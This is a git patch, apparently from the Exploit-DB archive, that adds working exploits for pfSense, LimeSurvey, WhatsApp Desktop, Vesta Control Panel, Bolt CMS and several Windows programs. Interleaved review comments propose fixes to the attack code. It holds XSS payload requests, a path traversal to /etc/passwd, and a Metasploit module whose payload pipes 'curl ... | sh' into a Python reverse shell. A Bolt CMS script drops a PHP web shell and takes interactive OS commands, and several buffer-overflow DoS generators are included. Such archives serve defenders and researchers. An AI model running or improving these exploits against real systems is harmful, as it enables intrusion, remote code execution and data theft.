From 85bef6929fae93d7aed3049ad516fc29467afe3f Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 7 Apr 2020 05:02:01 +0000 Subject: [PATCH] DB: 2020-04-07 17 changes to exploits/shellcodes Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC) SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC) Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC) Frigate 3.36 - Denial of Service (PoC) UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC) UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC) UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC) ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC) Memu Play 7.1.3 - Insecure Folder Permissions Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH) Microsoft NET USE win10 - Insufficient Authentication Logic LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit) WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting Bolt CMS 3.7.0 - Authenticated Remote Code Execution LimeSurvey 4.1.11 - 'File Manager' Path Traversal pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting --- exploits/freebsd/webapps/48300.txt | 39 ++++ exploits/multiple/webapps/48294.rb | 239 +++++++++++++++++++++ exploits/multiple/webapps/48295.txt | 42 ++++ exploits/php/webapps/48289.txt | 30 +++ exploits/php/webapps/48296.py | 167 +++++++++++++++ exploits/php/webapps/48297.txt | 18 ++ exploits/windows/dos/48284.py | 35 ++++ exploits/windows/dos/48285.py | 36 ++++ exploits/windows/dos/48286.py | 39 ++++ exploits/windows/dos/48287.py | 26 +++ exploits/windows/dos/48288.py | 23 ++ exploits/windows/dos/48290.py | 24 +++ exploits/windows/dos/48291.py | 22 ++ exploits/windows/dos/48292.txt | 22 ++ exploits/windows/local/48283.txt | 70 +++++++ exploits/windows/local/48293.py | 79 +++++++ exploits/windows/local/48299.txt | 313 ++++++++++++++++++++++++++++ files_exploits.csv | 17 ++ 18 files changed, 1241 insertions(+) create mode 100644 
exploits/freebsd/webapps/48300.txt create mode 100755 exploits/multiple/webapps/48294.rb create mode 100644 exploits/multiple/webapps/48295.txt create mode 100644 exploits/php/webapps/48289.txt create mode 100755 exploits/php/webapps/48296.py create mode 100644 exploits/php/webapps/48297.txt create mode 100755 exploits/windows/dos/48284.py create mode 100755 exploits/windows/dos/48285.py create mode 100755 exploits/windows/dos/48286.py create mode 100755 exploits/windows/dos/48287.py create mode 100755 exploits/windows/dos/48288.py create mode 100755 exploits/windows/dos/48290.py create mode 100755 exploits/windows/dos/48291.py create mode 100644 exploits/windows/dos/48292.txt create mode 100644 exploits/windows/local/48283.txt create mode 100755 exploits/windows/local/48293.py create mode 100644 exploits/windows/local/48299.txt diff --git a/exploits/freebsd/webapps/48300.txt b/exploits/freebsd/webapps/48300.txt new file mode 100644 index 000000000..f485c9955 --- /dev/null +++ b/exploits/freebsd/webapps/48300.txt 
@@ -0,0 +1,39 @@ +# Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg +# Vendor Homepage: https://www.pfsense.org +# Version: PfSense 2.4.4-P3 +# Tested on: FreeBSD 11.2-RELEASE-p10 +# CVE : CVE-2020-11457 + +# Vulnerability Details +# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel. +# Vulnerable Parameter : descr + + +# POC +# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name. +# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is +# the id of the user containing the payload. + + +POST /system_usermanager.php?act=new HTTP/1.1 +Host: TARGET +Connection: close +Content-Length: 410 +Cache-Control: max-age=0 +Origin: https://TARGET +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Sec-Fetch-Dest: document +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Referer: https://TARGET/system_usermanager.php?act=new +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d + 
+__csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save \ No newline at end of file diff --git a/exploits/multiple/webapps/48294.rb b/exploits/multiple/webapps/48294.rb new file mode 100755 index 000000000..53c997d1a --- /dev/null +++ b/exploits/multiple/webapps/48294.rb 
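Review bot: The header does not state what privilege the injecting account needs; the request creates a user through system_usermanager.php, which presumably requires User Manager rights, so the realistic scenario is one privileged user attacking another and that bound should be written into the Vulnerability Details. The Cookie, __csrf_magic and caref values are bound to the author's session and instance and should be marked as such, e.g. `# Cookie / __csrf_magic / caref values are session- and instance-specific`, instead of appearing as literals. A 'Fixed in' line is also missing; if the vendor has published a fix, naming the version helps defenders triage.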
@@ -0,0 +1,239 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Ftp + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Vesta Control Panel Authenticated Remote Code Execution", + 'Description' => %q{ + This module exploits command injection vulnerability in v-list-user-backups bash script file. + Low privileged authenticated users can execute arbitrary commands under the context of the root user. + + An authenticated attacker with a low privileges can inject a payload in the file name starts with dot. + During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As + result of that backup process, when an attacker try to list existing backups injected payload will be + executed. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'], + ['CVE', '2020-10808'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 8083, + 'WfsDelay' => 300, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => false, + 'DisclosureDate' => "Mar 17 2020", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(8083), + OptString.new('USERNAME', [true, 'The username to login as']), + OptString.new('PASSWORD', [true, 'The password to login with']), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) + ] + ) + deregister_options('FTPUSER', 'FTPPASS') + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def login + # + # This is very simple login process. Nothing important. + # We will be using cookie and csrf_token across the module so that we are global variable. + # + print_status('Retrieving cookie and csrf token values') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'login', '/'), + }) + + if res && res.code == 200 && !res.get_cookies.empty? + @cookie = res.get_cookies + @csrf_token = res.body.scan(//).flatten[0] || '' + if @csrf_token.empty? 
+ fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') + end + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + print_good('Cookie and CSRF token values successfully retrieved') + + print_status('Authenticating to HTTP Service with given credentials') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'login', '/'), + 'cookie' => @cookie, + 'vars_post' => { + 'token' => @csrf_token, + 'user' => username, + 'password' => password + } + }) + + if res && res.code == 302 && !res.get_cookies.empty? + print_good('Successfully authenticated to the HTTP Service') + @cookie = res.get_cookies + else + fail_with(Failure::Unknown, 'Credentials are not valid.') + end + end + + def is_scheduled_backup_running + res = trigger_scheduled_backup + # + # MORE explaination. + # + if res && res.code == 302 + res = trigger_payload + if res.body.include?('An existing backup is already running. Please wait for that backup to finish.') + return true + else + print_good('It seems scheduled backup is done ..! Triggerring payload <3') + return false + end + else + fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?') + end + return false + end + + def trigger_payload + res = send_request_cgi({ + 'method' => 'GET', + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'), + }) + if res && res.code == 200 + res + else + fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?') + end + end + + def trigger_scheduled_backup + res = send_request_cgi({ + 'method' => 'GET', + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'), + }) + if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\// + res + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + end + + def payload_implant + # + # Our payload will be placed as a file name on FTP service. 
+ # Payload lenght can't be more then 255 and SPACE can't be used because of the + # bug in the backend software. Due to these limitations, I used web delivery method. + # + # When the initial payload executed. It will execute very short perl command, which is going to fetch + # actual python meterpreter first stager and execute it. + # + final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first + p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'" + + # Yet another datastore variable overriding. + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + port_restore = datastore['RPORT'] + datastore['RPORT'] = 21 + datastore['FTPUSER'] = username + datastore['FTPPASS'] = password + + # + # Connecting to the FTP service with same creds as web ui. + # Implanting the very first stage of payload as a empty file. + # + if (not connect_login) + fail_with(Failure::Unknown, 'Unable to authenticate to FTP service') + end + print_good('Successfully authenticated to the FTP service') + + res = send_cmd_data(['PUT', ".a';$(#{p});'"], "") + if res.nil? + fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server") + end + print_good('Successfully uploaded the payload as a file name') + disconnect + + # Revert datastore variables. + datastore['RPORT'] = port_restore + datastore['SSL'] = true if ssl_restore + end + + def exploit + start_http_server + payload_implant + login + trigger_scheduled_backup + print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.') + while is_scheduled_backup_running == true + print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...') + Rex.sleep(30) + end + stop_service + end + + def on_request_uri(cli, request) + print_good('First stage is executed ! 
Sending 2nd stage of the payload') + second_stage = "python -c \"#{payload.encoded}\"" + send_response(cli, second_stage, {'Content-Type'=>'text/html'}) + end + + def start_http_server + # + # HttpClient and HttpServer use same SSL variable :( + # We don't need a SSL for payload delivery. + # + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + print_status("Second payload download URI is #{get_uri}") + # We need that global variable since get_uri keep using SSL from datastore + # We have to get the URI before restoring the SSL. + @second_stage_url = get_uri + datastore['SSL'] = true if ssl_restore + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/48295.txt b/exploits/multiple/webapps/48295.txt new file mode 100644 index 000000000..7e0e139ae --- /dev/null +++ b/exploits/multiple/webapps/48295.txt 
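Review bot: payload_implant restores RPORT and SSL only on the success path; both fail_with calls raise before the `datastore['RPORT'] = port_restore` line, so a failed FTP login leaves the module with RPORT=21 and SSL=false and disconnect is never called, which is why the FTP section should sit in a begin/ensure (below). Separately, exploit's `while is_scheduled_backup_running == true` loop has no upper bound, so the 'WfsDelay' => 300 default is never honoured and a stuck backup spins the module forever; counting iterations against datastore['WfsDelay'] and failing with a timeout would fix that. The comment `# MORE explaination.` in is_scheduled_backup_running is a placeholder, and that method re-triggers a backup and a payload fetch on every call, which its name does not convey. The `res.body.scan(//)` token pattern in login looks emptied by extraction (an HTML tag was probably dropped), so it should be checked against the upstream module.
```ruby
  def payload_implant
    # … unchanged: payload construction, SSL/RPORT/FTPUSER/FTPPASS overrides …
    begin
      unless connect_login
        fail_with(Failure::Unknown, 'Unable to authenticate to FTP service')
      end
      print_good('Successfully authenticated to the FTP service')
      # … unchanged: send_cmd_data PUT of the payload file name and its nil check …
      print_good('Successfully uploaded the payload as a file name')
    ensure
      # Runs on the fail_with paths too, so the datastore never stays at RPORT=21 / SSL=false.
      disconnect if sock
      datastore['RPORT'] = port_restore
      datastore['SSL'] = true if ssl_restore
    end
  end
```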
@@ -0,0 +1,42 @@ +# Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting +# Date: 2020-01-21 +# Exploit Author: Gal Weizman +# Vendor Homepage: https://www.whatsapp.com +# Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe +# Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg +# Version: 0.3.9308 +# Tested On: Mac OS, Windows, iPhone +# CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426 + +// step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308) +// step 2: open devtools and search in all files "t=e.id" +// step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found +// step 4: paste "https://example.com" in the text box and hit "Enter" +// step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter" + +var payload = `(async function() { + alert(navigator.userAgent); + (async function() { + // read "file:///C:/windows/system32/drivers/etc/hosts" content + const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz')); + const t = await r.text(); + alert(t); + }()) +}())`; + +payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`; + +e.__x_matchedText = payload; + +e.__x_body = ` + Innocent text + + ${payload} + + More Innocent text +`; + +// step 6: press F8 in order for the execution to continue +// result: a message should be sent to the victim that once is clicked will execute the payload above + +// further information: https://github.com/weizman/CVE-2019-18426 \ No newline at end of file diff --git a/exploits/php/webapps/48289.txt b/exploits/php/webapps/48289.txt new file mode 100644 index 000000000..213de9367 --- /dev/null +++ b/exploits/php/webapps/48289.txt 
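Review bot: The snippet assigns `e.__x_matchedText` and `e.__x_body`, but `e` is never defined in the file; it only exists as a local of the frame paused at the `t = e.id` breakpoint, and the comments should say so explicitly, e.g. `// 'e' is the message object in scope at the breakpoint set in step 3`. The inner fetch reads a Windows-only path while the header lists Mac OS and iPhone as tested, so the header should separate what was verified (the message rendering) from the file read, which presumably fails on non-Windows hosts. Step 1's "Will only work on ... version 0.3.9308" is the only place the version dependency of the `t=e.id` search string is stated; it belongs in the header next to the Version line.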
@@ -0,0 +1,30 @@ +# Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg, Michael Burkey +# Vendor Homepage: https://www.limesurvey.org +# Version: LimeSurvey 4.1.11+200316 +# Tested on: Ubuntu 18.04.4 +# CVE : CVE-2020-11456 + +# Vulnerability Details +Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel. +Vulnerable Parameter : "title" + + +# POC +POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1 +Host: TARGET +Content-Length: 374 +Cache-Control: max-age=0 +Origin: http://TARGET +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D +Connection: close + +YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0= \ No newline at end of file diff --git a/exploits/php/webapps/48296.py b/exploits/php/webapps/48296.py new file mode 100755 index 000000000..9b3401a53 --- /dev/null +++ b/exploits/php/webapps/48296.py 
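Review bot: The PoC shows where the payload is stored but not where it renders; unlike the sibling pfSense entry in this commit, it never names the page on which the stored `title` executes, and a line naming that page belongs under Vulnerability Details. The Cookie and YII_CSRF_TOKEN values are bound to the author's session and should be marked as placeholders rather than pasted literals. The privilege required to reach admin/surveysgroups/sa/create is also unstated, which matters for rating severity.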
@@ -0,0 +1,167 @@ +# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution +# Date: 2020-04-05 +# Exploit Author: r3m0t3nu11 +# Vendor Homepage: https://bolt.cm/ +# Software Link: https://bolt.cm/ +# Version: up to date and 6.x +# Tested on: Linux +# CVE : not-yet-0day + +# last version + +# p0c + + +#!/usr/bin/python + +import requests +import sys +import warnings +import re +import os +from bs4 import BeautifulSoup +from colorama import init +from termcolor import colored + +init() + +print(colored(''' + ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ + ▄▄▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ +▐░░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ +▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ +▐░▌▐░▌▐░▌ +▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ +▐░▌▐░█▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ + ▐░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ +▀▀▀▀▀▀▀▀▀█░▌ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ + ▐░ +▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ +▄▄▄▄▄▄▄▄▄█░▌ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ +▐░▌▐░░░░░░░░░░░▌ + ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ + ▀▀▀▀▀▀▀▀▀▀▀ + +Pre Auth rce with low credintanl +By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) + + + +if len(sys.argv) != 4: + print((len(sys.argv))) + print((colored("[~] Usage : ./bolt.py url username password","red"))) + exit() +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] + + + +request = requests.session() +print((colored("[+] Retrieving CSRF token to submit the login +form","green"))) +page = request.get(url+"/bolt/login") +html_content = page.text +soup = BeautifulSoup(html_content, 'html.parser') +token = soup.findAll('input')[2].get("value") + +login_info = { + "user_login[username]": username, + "user_login[password]": password, + "user_login[login]": "", + "user_login[_token]": token + } + +login_request = 
request.post(url+"/bolt/login", login_info) +print((colored("[+] Login token is : {0}","green")).format(token)) + + + +aaa = request.get(url+"/bolt/profile") +soup0 = BeautifulSoup(aaa.content, 'html.parser') +token0 = soup0.findAll('input')[6].get("value") +data_profile = { +"user_profile[password][first]":"password", +"user_profile[password][second]":"password", +"user_profile[email]":"a@a.com", +"user_profile[displayname]":"", +"user_profile[save]":"", +"user_profile[_token]":token0 + +} +profile = request.post(url+'/bolt/profile',data_profile) + + + + +cache_csrf = request.get(url+"/bolt/overview/showcases") + +soup1 = BeautifulSoup(cache_csrf.text, 'html.parser') +csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token") + + +asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true") +soup2 = BeautifulSoup(asyncc.text, 'html.parser') +tables = soup2.find_all('span', class_ = 'entry disabled') + + +print((colored("[+] SESSION INJECTION ","green"))) +for all_tables in tables: + +f= open("session.txt","a+") +f.write(all_tables.text+"\n") +f.close() +num_lines = sum(1 for line in open('session.txt')) + +renamePostData = { +"namespace": "root", +"parent": "/app/cache/.sessions", +"oldname": all_tables.text, +"newname": "../../../public/files/test{}.php".format(num_lines), +"token": csrf + } +rename = request.post(url+"/async/folder/rename", renamePostData) + + + + +try: +url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) + +rev = requests.get(url1).text +r1 = re.findall('php',rev) + +r2 = r1[0] +if r2 == "php" : +fileINJ = "test{}".format(num_lines) + +print((colored("[+] FOUND : "+fileINJ,"green"))) + +except IndexError: +print((colored("[-] Not found.","red"))) + +new_name = 0 +while new_name != 'quit': +inputs = input(colored("Enter OS command , for exit 'quit' : +","green","on_red")) +if inputs == "quit" : +exit() +else: +a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) +aa = a.text +r11 = 
re.findall('...displayname";s:..:"([\w\s\W]+)',aa) + + +print((r11)[0]) + + + + +Greetz to : all my friends \ No newline at end of file diff --git a/exploits/php/webapps/48297.txt b/exploits/php/webapps/48297.txt new file mode 100644 index 000000000..bda2a8a0f --- /dev/null +++ b/exploits/php/webapps/48297.txt @@ -0,0 +1,18 @@ +# Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg, Michael Burkey +# Vendor Homepage: https://www.limesurvey.org +# Version: LimeSurvey 4.1.11+200316 +# Tested on: Ubuntu 18.04.4 +# CVE : CVE-2020-11455 + +# Vulnerability Details +# Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey +# that allows an attacker to download arbitrary files. The file manager functionality will also +# delete the file after it is downloaded (if the web service account has permissions to do so), +# allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file. +Vulnerable Parameter : "path" + + +# POC +https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd \ No newline at end of file diff --git a/exploits/windows/dos/48284.py b/exploits/windows/dos/48284.py new file mode 100755 index 000000000..a91229f95 --- /dev/null +++ b/exploits/windows/dos/48284.py 
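Review bot: The script performs two destructive actions that the header never mentions: the profile POST resets the logged-in account's password to `password` and its e-mail to `a@a.com`, and the rename loop moves every entry under /app/cache/.sessions out of the cache, which presumably invalidates all active sessions on the target; both need to be stated up front. `fileINJ` is only bound inside the try block, so when nothing is found the except branch prints 'Not found.' and the later `request.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))` raises NameError; set `fileINJ = None` before the try and `sys.exit(1)` in the except branch. The header is also self-contradictory — the title says Authenticated RCE and the script requires credentials, while the banner says 'Pre Auth rce' and the CVE line reads 'not-yet-0day' — and `#!/usr/bin/python` sits mid-file where it is not a shebang. The `findAll('input')[2]`/`[6]` and `findAll('div')[12]` positional lookups silently pick the wrong element on any template change, and the for/try/while body indentation appears lost in this rendering, so block structure should be checked against the upstream file.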
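Review bot: `Vulnerable Parameter : "path"` is the only header line without a leading `#`, unlike the sibling 48289.txt; make it `# Vulnerable Parameter : "path"`. The description does not state the access level needed: the request goes through index.php/admin/filemanager, which presumably requires an authenticated admin session, and that bounds the severity. Since the description says the file is deleted after download, the impact statement should call out integrity/availability as well as disclosure.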
@@ -0,0 +1,35 @@ +# Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC) +# Discovery by: 0xMoHassan +# Date: 2020-04-04 +# Vendor Homepage: http://www.nsauditor.com +# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe +# Tested Version: 4.2.2.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows XP - SP3 + +# About App + +# Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find, # recover and backup activation keys for +9000 popular software programs installed on local or network computers. + + +# PoC +# 1.Run the python script, it will create a new file "POC.txt" +# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code" +# 2.Paste the content of POC.txt into the Field: 'Key' +# 6.click 'ok' +# 5.Magic happen :) + + + +#!/usr/bin/env python +buff = "\x41" *500 +buff += "\x41" * 500 + +try: + f=open("POC.txt","w") + print "[+] Creating %s bytes payload.." %len(buff) + f.write(buff) + f.close() + print "[+] POC created!" +except: + print "POC cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/48285.py b/exploits/windows/dos/48285.py new file mode 100755 index 000000000..12369a016 --- /dev/null +++ b/exploits/windows/dos/48285.py 
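Review bot: `#!/usr/bin/env python` sits after twenty lines of comments, so it is not a shebang and the script will not run as `./POC.py`; move it to line 1. The same body is repeated verbatim in 48285.py and 48286.py and carries the same issues: Python 2 `print` statements, a bare `except:` that hides the actual error, a file that is never closed if write fails, and `buff` built from two identical 500-byte pieces that could be one `"\x41" * 1000`. Replacing the try block with `with open("POC.txt", "w") as f:` / `    f.write(buff)` and `print("[+] POC created!")` fixes the first three. The PoC step list is numbered 1,3,2,6,5 in all three files and should be renumbered.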
@@ -0,0 +1,36 @@ +# Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC) +# Exploit Author: 0xMoHassan +# Date: 2020-04-04 +# Vendor Homepage: https://www.spotauditor.com/ +# Software Link: http://www.nsauditor.com/downloads/spotauditor_setup.exe +# Tested Version: 5.3.4 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows XP - SP3 + +# About App + +# SpotAuditor is an advanced password recovery solution. The software recovers over 40 popular programs passwords, +# including passwords saved Google Chrome, Internet Explorer, Firefox and Opera browsers, Microsoft Office Outlook +# smtp and pop passwords, Hotmail password, Facebook password, Gmail password, Yahoo password, Aol password, 20 +# top FTP program passwords, recovers saved passwords hidden behind of asterisks on dialogs and web forms. + +# PoC +# 1.Run the python script, it will create a new file "POC.txt" +# 3.Run SpotAuditor and click on "Register -> Enter Registration Code" +# 2.Paste the content of POC.txt into the Field: 'Name' +# 6.click 'ok' +# 5.Magic happen :) + + +#!/usr/bin/env python +buff = "\x41" *500 +buff += "\x41" * 500 + +try: + f=open("POC.txt","w") + print "[+] Creating %s bytes payload.." %len(buff) + f.write(buff) + f.close() + print "[+] POC created!" +except: + print "POC cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/48286.py b/exploits/windows/dos/48286.py new file mode 100755 index 000000000..ce265c73f --- /dev/null +++ b/exploits/windows/dos/48286.py 
@@ -0,0 +1,39 @@ +# Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC) +# Discovery by: 0xMoHassan +# Date: 2020-04-04 +# Vendor Homepage: http://www.nsauditor.com +# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe +# Tested Version: 3.2.0.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows XP - SP3 + +# About App +# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities, +# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that +# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing +# software significantly reduces the total cost of network management in enterprise environments by enabling +# IT personnel and systems administrators gather a wide range of information from all the computers in the network without +# installing server-side applications on these computers and create a report of potential problems that were found. + + +# PoC +# 1.Run the python script, it will create a new file "POC.txt" +# 3.Run Nsauditor and click on "Register -> Enter Registration Code" +# 2.Paste the content of POC.txt into the Field: 'Name' +# 6.click 'ok' +# 5.Magic happen :) + + + +#!/usr/bin/env python +buff = "\x41" *500 +buff += "\x41" * 500 + +try: + f=open("POC.txt","w") + print "[+] Creating %s bytes payload.." %len(buff) + f.write(buff) + f.close() + print "[+] POC created!" +except: + print "POC cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/48287.py 